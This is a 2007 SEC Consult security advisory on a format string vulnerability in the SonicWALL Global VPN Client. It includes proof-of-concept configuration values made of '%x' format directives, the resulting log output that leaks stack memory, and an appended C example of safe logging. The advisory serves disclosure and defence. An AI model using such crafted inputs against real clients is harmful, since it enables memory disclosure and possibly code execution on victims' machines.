SEC Consult Security Advisory < 20071204-0 >
=====================================================================================
              title: SonicWALL Global VPN Client Format String Vulnerability
            program: SonicWALL Global VPN Client
 vulnerable version: < 4.0.0.830
           homepage: www.sonicwall.com
              found: 06-12-2007
                 by: lofi42*
         perm. link: http://www.sec-consult.com/305.html
=====================================================================================

Vendor description:
---------------
The SonicWALL Global VPN Client provides mobile users with access to
mission-critical network resources by establishing secure connections to their
office network's IPSec-compliant SonicWALL VPN gateway.

Vulnerability overview:
---------------
SonicWALL Global VPN Client suffers from a format string vulnerability that can
be triggered by supplying a specially crafted configuration file. This
vulnerability could allow an attacker to execute arbitrary code in the context
of the vulnerable client. For a successful attack, the attacker would have to
entice the victim into importing the special configuration file.

Vulnerability details:
---------------
Format string errors occur when the client parses the "name" attribute of the
"Connection" tag and the content of the "Hostname" tags in the configuration
file.

Examples: %s%s%s%s

The bug has been verified in versions 3.1.556 and 4.0.0.810. With version
3.1.556 the client has to initiate a connection to trigger the vulnerability,
whereas with version 4.0.0.810 (beta) the bug can be exploited by simply
double-clicking the configuration file. This can be attributed to the 4.0
version trying to write the imported configuration to an extra debug log.

Proof-of-concept:
---------------
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted
config file and then viewing the debug logfile.

A configuration like this...

AAAAAAAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
BBBBBBBBBB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

...yields the following logfile:

----------------------< Connection name >-----------------------------------
OnLogMessage(): 'The connection "AAAAAAAAAAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been enabled.' ''
---------------------------------------------------------

------------------------------------------------------------------
BBBBBBBBBB656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
-------------------------------------------------------------

Vendor status:
---------------
vendor notified: 2007-08-16
vendor response: 2007-08-29
patch available: 2007-11-26

The issue has been fixed in SonicWall VPN client 4.0.0.830.
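Added example (not part of the advisory, and not SonicWALL's code): the logging pattern behind this class of bug, shown in C with the imported connection name consumed through a constant "%s" format instead of being used as the format itself, plus a check that flags '%' directives in imported configuration values before they reach a logger. Function names and the sample name are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if an imported value contains a '%' conversion directive,
 * i.e. it would be interpreted if ever passed as a printf-style format.
 * Useful as a pre-import sanity check on "name" and "Hostname" values. */
int contains_format_directives(const char *value) {
    return strchr(value, '%') != NULL;
}

/* Vulnerable pattern (the kind of bug the advisory describes):
 *
 *     snprintf(buf, sizeof buf, name);   // untrusted value used as format
 *
 * A name such as "AAAA%x.%x.%x" then pulls stack words into the log line,
 * exactly like the hex runs in the PoC output. Deliberately not compiled. */

/* Hardened logger: the format is a compile-time constant and the untrusted
 * name is always an argument. Returns the number of bytes written, or -1
 * if the message did not fit (snprintf truncation is also checked). */
int log_connection_enabled(char *out, size_t out_len, const char *name) {
    int n = snprintf(out, out_len, "The connection \"%s\" has been enabled.", name);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return n;
}

/* Constructed sample: a hostile "name" attribute like the one in the PoC. */
static const char *kSampleName = "AAAAAAAAAA%x.%x.%x.%x";

int main(void) {
    char buf[256];
    if (contains_format_directives(kSampleName))
        puts("warning: connection name contains '%' directives");
    if (log_connection_enabled(buf, sizeof buf, kSampleName) > 0)
        puts(buf);   /* prints the '%x' literally; nothing is expanded */
    return 0;
}
```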